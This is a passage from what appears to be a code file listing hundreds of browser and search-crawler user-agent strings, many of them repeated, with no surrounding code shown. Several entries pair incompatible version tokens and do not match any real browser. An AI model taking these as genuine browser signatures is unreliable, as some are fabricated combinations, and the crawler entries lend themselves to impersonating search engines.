'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
